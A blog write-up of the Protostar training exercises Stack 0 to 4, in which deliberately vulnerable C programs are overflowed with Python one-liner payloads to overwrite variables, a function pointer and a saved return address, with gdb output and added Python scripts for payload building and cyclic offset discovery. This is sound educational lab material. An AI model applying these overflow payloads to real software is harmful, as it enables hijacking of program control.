paulwalko.github.io/_site/writeup/nebula_exploit_exercises.html

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<script type="text/javascript">
var host = "paul.walko.org";
if ((host == window.location.host) && (window.location.protocol != "https:"))
window.location.protocol = "https";
</script>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-79393488-1', 'auto');
ga('send', 'pageview');
</script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Walkthrough for Protostar exercises on exploit-exercises.com">
<title>Protostar Exploit Exercises Solutions 0-4</title>
<!-- favicon -->
<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
<link rel="icon" type="image/png" sizes="192x192" href="https://paul.walko.org/favicon/android-icon-192x192.png">
<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
<meta name="msapplication-TileColor" content="#ffffff">
<meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
<meta name="theme-color" content="#ffffff">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
<script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
<link rel="canonical" href=" { { site.url } }{ { page.url } }" />
<!--[if lt IE 9]>
<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
<![endif]-->
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/markdownreader.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/pygments_monokai.css">
<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/code_block.css">
</head>
<body>
<header id="l-header">
<div class="container">
<div class="row logo">
<div class="col-lg-7">
<h1>Paul Walko</h1>
</div>
</div>
<div class="row navicon">
<a href=""><i class="fa fa-navicon"></i></a>
</div>
<div class="row navbar">
<nav class="col-lg-8 col-md-8 col-xs-12">
<ul class="row">
<li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
<li class="col-lg-3">
<ul class="subnav">
<a href="javascript:void(0)">POSTS</a>
<li><a href="https://paul.walko.org/category">CATEGORY</a></li>
<li><a href="https://paul.walko.org/tag">TAG</a></li>
</ul>
</li>
<li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
<li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
</ul>
</nav>
<div class="search col-lg-4 col-md-4 col-xs-12">
<form id="dummySearch">
<label for="search"></label>
<input id="search" name="search" type="text" placeholder="Not That Dummy Search">
<i class="fa fa-search"></i>
</form>
<script>
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
</script>
</div>
</div>
</div>
</header>
<div class="container">
<div class="row">
<div id="markdown-container" class="col-lg-9">
<header>
<p id="postTitle">Protostar Exploit Exercises Solutions 0-4</p>
<ul class="tags clearfix">
<li><i class="fa fa-tag"></i> exploit-exercises</li>
<li><i class="fa fa-tag"></i> protostar</li>
<li><i class="fa fa-tag"></i> hacking</li>
</ul>
<p id="postMeta">posted on 14 Jun 2016 under category <a href="https://paul.walko.org/category/">writeup</a></p>
</header>
<p>Note: When you first log on to Protostar, make sure you are actually using bash. It will make things a lot easier.</p>
<h1 id="stack-0">Stack 0</h1>
<p>Here's what we're given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}
</code></pre>
</div>
<p>The first thing I took note of is the size of <code class="highlighter-rouge">buffer</code>: 64 bytes. The program then reads a line from stdin into <code class="highlighter-rouge">buffer</code> with <code class="highlighter-rouge">gets()</code>, which never checks the destination size, and afterwards tests whether the <code class="highlighter-rouge">modified</code> variable is still zero. Since <code class="highlighter-rouge">modified</code> is declared right next to <code class="highlighter-rouge">buffer</code> and ends up just above it on the stack, a string longer than 64 bytes should spill into it. Let's see:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
</code></pre>
</div>
<p>Exactly 64 bytes fits, so nothing changes. Now with 65 bytes, so that the last one lands in <code class="highlighter-rouge">modified</code>:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
</code></pre>
</div>
<p>Solved!</p>
<h1 id="stack-1">Stack 1</h1>
<p>Here's the code we're given:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
</code></pre>
</div>
<p>Just like Stack 0, we're given a 64-byte <code class="highlighter-rouge">buffer</code> that is filled with our input, except this time the input comes from <code class="highlighter-rouge">argv[1]</code> via <code class="highlighter-rouge">strcpy()</code> instead of <code class="highlighter-rouge">gets()</code>, and <code class="highlighter-rouge">modified</code> has to equal exactly <code class="highlighter-rouge">0x61626364</code> rather than just being non-zero. Keep in mind that x86 is <a href="https://en.wikipedia.org/wiki/Endianness">little endian</a>, so the four bytes of that value have to be written in reverse order. First a plain 64-byte string to confirm the layout:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
</code></pre>
</div>
<p>That leaves <code class="highlighter-rouge">modified</code> at zero, as expected. Now with the target bytes appended in reverse order (<code class="highlighter-rouge">\x64\x63\x62\x61</code>, which is just the ASCII string <code class="highlighter-rouge">dcba</code>):</p>
<div class="highlighter-rouge"><pre class="highlight"><code>$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
</code></pre>
</div>
<p>Woo!</p>
<h1 id="stack-2">Stack 2</h1>
<p>The website says this one involves environment variables and how they can be set, so let's look at the code:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;
  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}
</code></pre>
</div>
<p>There's the <code class="highlighter-rouge">char buffer[64]</code> again, plus a <code class="highlighter-rouge">char *variable</code> that points at the <code class="highlighter-rouge">GREENIE</code> environment variable. Since <code class="highlighter-rouge">GREENIE</code> is <code class="highlighter-rouge">strcpy()</code>'d into <code class="highlighter-rouge">buffer</code>, the same overflow applies: a 64-byte filler followed by the four bytes of <code class="highlighter-rouge">0x0d0a0d0a</code> in little-endian order (<code class="highlighter-rouge">\x0a\x0d\x0a\x0d</code>), since that is what the if statement compares against. Note that this value contains newline bytes (<code class="highlighter-rouge">0x0a</code>), which <code class="highlighter-rouge">gets()</code> would have treated as the end of the input; passing it through the environment sidesteps that. So I set the variable with <code class="highlighter-rouge">export</code> and then run the binary:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ export GREENIE=`python -c 'print "A"*64+"\x0a\x0d\x0a\x0d"'`
user@protostar:/opt/protostar/bin$ ./stack2
you have correctly modified the variable
</code></pre>
</div>
<h1 id="stack-3">Stack 3</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}
</code></pre>
</div>
<p>This time the variable sitting above <code class="highlighter-rouge">buffer</code> is a function pointer, <code class="highlighter-rouge">fp</code>, which <code class="highlighter-rouge">main()</code> calls if it is non-zero. So I need to fill the 64-byte buffer like before and then append the address of <code class="highlighter-rouge">win()</code>, which overwrites <code class="highlighter-rouge">fp</code> and makes the program call <code class="highlighter-rouge">win()</code> for me.</p>
<p>First, to find the address of <code class="highlighter-rouge">win</code>, I ran <code class="highlighter-rouge">objdump -d stack3 | grep win</code>, which outputs <code class="highlighter-rouge">08048424</code>:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack3 | grep win
08048424 &lt;win&gt;:
</code></pre>
</div>
<p>Appending it to the buffer in little-endian order:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*64 + "\x24\x84\x04\x08"'` | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
</code></pre>
</div>
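<p>The Stack 1, 2 and 3 payloads differ only in the value written and the channel it travels through (<code class="highlighter-rouge">argv[1]</code>, the environment, or stdin), so it is worth scripting the construction once. The block below is an added example, not code from the original post: it is Python 3 rather than the Python 2 one-liners used above, so payloads are <code class="highlighter-rouge">bytes</code>. It packs the value little-endian with <code class="highlighter-rouge">struct</code>, parses the address out of an <code class="highlighter-rouge">objdump</code> line copied from the Stack 3 output above (the only constructed input), and checks a payload against the bytes each channel cannot carry: <code class="highlighter-rouge">gets()</code> stops at a newline, so a stdin payload must not contain <code class="highlighter-rouge">0x0a</code>, while argv and environment strings are NUL-terminated and cannot contain <code class="highlighter-rouge">0x00</code>. That check is exactly why Stack 2's <code class="highlighter-rouge">0x0d0a0d0a</code> has to travel through <code class="highlighter-rouge">GREENIE</code> rather than through <code class="highlighter-rouge">gets()</code>.</p>

```python
"""Payload construction for Protostar stack1-stack3.

Added example, not code from the original post.  Python 3: payloads are
bytes, unlike the Python 2 `print "A"*64` one-liners in the writeup.
Offsets and values are the ones the writeup reports.
"""
import re
import struct


def p32(value):
    """Pack a 32-bit value little-endian, the byte order x86 stores ints in."""
    return struct.pack("<I", value)


def build_payload(padding, value, filler=b"A"):
    """`padding` filler bytes followed by `value` as a little-endian dword."""
    return filler * padding + p32(value)


# Bytes each delivery channel cannot carry.  gets() stops at '\n', so a payload
# read from stdin must not contain 0x0a; argv and environment strings are
# NUL-terminated, so strcpy() would stop copying at the first 0x00.
BAD_BYTES = {
    "stdin": {0x0A},
    "argv": {0x00},
    "env": {0x00},
}


def check_channel(payload, channel):
    """Return the set of forbidden byte values present in payload for channel."""
    return {b for b in payload if b in BAD_BYTES[channel]}


def symbol_address(objdump_text, name):
    """Extract a function's address from `objdump -d` output lines such as
    '08048424 <win>:'.  Raises KeyError if the symbol is not there."""
    pattern = r"^([0-9a-f]+) <%s>:" % re.escape(name)
    m = re.search(pattern, objdump_text, re.MULTILINE)
    if m is None:
        raise KeyError(name)
    return int(m.group(1), 16)


# Constructed input: the single objdump line the writeup shows for stack3.
OBJDUMP_STACK3 = "08048424 <win>:\n"

if __name__ == "__main__":
    stack1 = build_payload(64, 0x61626364)                             # argv[1]
    stack2 = build_payload(64, 0x0D0A0D0A)                             # GREENIE
    stack3 = build_payload(64, symbol_address(OBJDUMP_STACK3, "win"))  # stdin
    print("stack1:", stack1, "bad for argv:", check_channel(stack1, "argv"))
    print("stack2:", stack2, "bad for stdin:", check_channel(stack2, "stdin"),
          "bad for env:", check_channel(stack2, "env"))
    print("stack3:", stack3, "bad for stdin:", check_channel(stack3, "stdin"))
```

<p>To feed a payload to a binary from this script, write it with <code class="highlighter-rouge">sys.stdout.buffer.write()</code> rather than <code class="highlighter-rouge">print()</code>, so no text encoding or trailing newline gets in the way, and pipe or substitute it exactly as the one-liners above do.</p>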
<h1 id="stack-4">Stack 4</h1>
<div class="highlighter-rouge"><pre class="highlight"><code>#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}
</code></pre>
</div>
<p>This is similar to Stack 3, except there is no function pointer to overwrite: the overflow has to reach <code class="highlighter-rouge">main()</code>'s saved return address instead, so I need some extra padding to get to it before writing the address of <code class="highlighter-rouge">win</code>.</p>
<p>First I'm going to get the memory address of <code class="highlighter-rouge">win</code>, but I won't use this till the end:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ objdump -d stack4 | grep win
080483f4 &lt;win&gt;:
</code></pre>
</div>
<p>Now to figure out the padding, I ran the binary under gdb and binary-searched on the input length: the program exits cleanly while the input stays short of the saved return address, and segfaults at <code class="highlighter-rouge">0x41414141</code> once the A's overwrite it.</p>
<p>First with inputs of 50 and 100 bytes:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
&lt;http://www.gnu.org/software/gdb/bugs/&gt;...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r // with 50
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r // with 100
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r // with ~75
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r //with ~80
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
</code></pre>
</div>
<p>So the boundary is somewhere between 75 and 80. Narrowing it down: 80 crashes, 75 exits cleanly, and 76 crashes too, but differently, inside <code class="highlighter-rouge">__libc_start_main</code> rather than at <code class="highlighter-rouge">0x41414141</code>. That is because 76 A's stop just short of the return address and it is the terminating NUL that <code class="highlighter-rouge">gets()</code> appends which lands on its low byte, so 76 is the exact offset of the saved return address:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ gdb ./stack4
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
&lt;http://www.gnu.org/software/gdb/bugs/&gt;...
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r // with 80
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) r // with 75
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program exited with code 060.
(gdb) r // with 76
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
) at libc-start.c:187
187 libc-start.c: No such file or directory.
in libc-start.c
(gdb) Woo =&gt; 76
</code></pre>
</div>
<p>Alright, so the padding I need is 76 bytes; with the address of <code class="highlighter-rouge">win</code> appended in little-endian order:</p>
<div class="highlighter-rouge"><pre class="highlight"><code>user@protostar:/opt/protostar/bin$ echo `python -c 'print "A"*76 + "\xf4\x83\x04\x08"'` | ./stack4
code flow successfully changed
</code></pre>
</div>
<p>There you go.</p>
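<p>The binary search above finds the offset, but the usual shortcut is to feed the program a cyclic pattern in which no four-byte window repeats, so the value gdb reports in EIP after the crash identifies the offset in a single run. The block below is an added example, not part of the original post, in Python 3: it generates such a pattern (a De Bruijn sequence over the lowercase alphabet, the same construction pwntools' <code class="highlighter-rouge">cyclic</code> uses), looks a crash value up in it, and builds the final stack4 payload. The crash value is constructed for the example: it is the four bytes that would sit at offset 76, the position found above, if a 100-byte pattern were fed to <code class="highlighter-rouge">gets()</code>. In a real run you paste in the EIP gdb prints after the SIGSEGV.</p>

```python
"""Return-address offset discovery with a cyclic pattern (Protostar stack4).

Added example, not part of the original writeup.  Python 3.  The crash value
below is constructed from the offset the writeup found (76); against the real
binary it comes from gdb's "0x... in ?? ()" line after the segfault.
"""
import struct

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def cyclic(length, alphabet=ALPHABET, n=4):
    """First `length` bytes of a De Bruijn sequence over `alphabet` with window
    size n: no n-byte window repeats, so any n bytes pulled out of the pattern
    pin down exactly one offset.  Stops generating once `length` is reached."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t, p):
        if len(out) >= length:          # enough pattern, stop recursing
            return
        if t > n:
            if n % p == 0:
                out.extend(alphabet[a[j]] for j in range(1, p + 1))
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out[:length])


def cyclic_find(eip, max_length=4096, alphabet=ALPHABET, n=4):
    """Offset in the pattern of the bytes that ended up in EIP.  `eip` is the
    integer gdb prints; it is unpacked little-endian back into the four bytes
    that overwrote the saved return address.  Returns -1 if not found."""
    needle = struct.pack("<I", eip)
    return cyclic(max_length, alphabet, n).find(needle)


def stack4_payload(offset, win_addr):
    """Padding up to the saved return address, then win's address."""
    return b"A" * offset + struct.pack("<I", win_addr)


# Constructed crash value: what gdb would report for stack4 if a 100-byte
# pattern were fed to gets() and the saved return address sits at offset 76.
PATTERN = cyclic(100)
CRASH_EIP = struct.unpack("<I", PATTERN[76:80])[0]

if __name__ == "__main__":
    off = cyclic_find(CRASH_EIP)
    print("pattern:", PATTERN)
    print("crash EIP 0x%08x -> offset %d" % (CRASH_EIP, off))
    print("payload:", stack4_payload(off, 0x080483F4))
```

<p>Against the real binary: write <code class="highlighter-rouge">cyclic(100)</code> to stdin with <code class="highlighter-rouge">sys.stdout.buffer.write()</code>, run stack4 under gdb with that as input, and pass the faulting address gdb prints to <code class="highlighter-rouge">cyclic_find()</code>. This is also why the <code class="highlighter-rouge">0x41414141</code> crashes above could not say where the return address was: every window of an all-A input looks the same.</p>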
<h1 id="stack-5">Stack 5</h1>
<p>Finally, we get to do some shellcode!</p>
<p>I have a good idea about how to do this, but unfortunately I can't get something to work right, so I'll update this as soon as I do.</p>
</div>
<div id="markdown-outline" class="col-lg-3">
</div>
<div id="disqus_thread"></div>
<script type="text/javascript">
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments powered by Disqus.</a></noscript>
</div>
</div>
<footer id="l-footer">
<div class="container">
<div class="row">
<div id="contact" class="col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9">
<h3>CONTACT</h3>
<div class="row">
<address id="address" class="col-lg-6 col-md-6 col-sm-6">
United States<br>
Paul Walko<br>
</address>
<ul class="col-lg-6 col-md-6 col-sm-6">
<li class="email"><i class="fa fa-envelope"></i> <a href="mailto:paulsw.pw@gmail.com"> &nbsp;&nbsp;paulsw.pw@gmail.com</a></li>
<li class="github"><i class="fa fa-github"></i> <a href="https://www.github.com/paulwalko"> &nbsp;&nbsp;https://www.github.com/paulwalko</a></li>
</ul>
</div>
</div>
</div>
<p id="legal">
Copyright (c) 2015 Paul Walko | Powered by <a href="http://jekyllrb.com">Jekyll</a> &amp; <a href="http://github.com">GitHub</a> | designed &amp; built by <a href="http://unifreak.github.io">UniFreak</a>
</p>
</div>
</footer>
<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
<script type="text/javascript" src="https://paul.walko.org/javascripts/markdownreader.js"></script>
</body>
</html>